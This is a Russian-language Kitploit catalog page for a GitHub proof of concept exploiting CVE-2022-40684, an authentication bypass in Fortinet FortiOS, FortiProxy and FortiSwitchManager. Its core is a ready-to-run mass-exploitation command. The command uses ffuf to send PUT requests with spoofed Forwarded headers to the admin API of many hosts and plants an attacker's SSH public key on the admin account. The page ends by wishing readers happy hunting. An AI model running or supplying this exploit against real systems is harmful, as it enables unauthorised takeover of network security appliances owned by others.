Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-40684-POC — Эксплойт для CVE-2022-40684, затрагивающий Fortinet FortiOS, FortiProxy и FortiSwitchManager | Kitploit
Инструменты/GitHubGitHub/kljunowsky/cve-2022-40684-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияRed Teaming
GitHubkljunowsky/cve-2022-40684-poc

CVE-2022-40684-POC

Эксплойт для CVE-2022-40684, затрагивающий Fortinet FortiOS, FortiProxy и FortiSwitchManager

Репозиторий
1623 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-40684-POC

Обход аутентификации FortiProxy / FortiOS

Массовая эксплуатация

/api/v2/cmdb/system/admin/<username>

{"ssh-public-key1": "<your-id_rsa.pub>"}

root@kitploit:~
ffuf -c -w hosts.txt -u FUZZ/api/v2/cmdb/system/admin/admin -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1
]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "kljunowsky"}' -mr "SSH" -r

Удачной охоты!

Требования

ffuf Благодарность @joohoi!

Twitter

LinkedIn

Скачать инструмент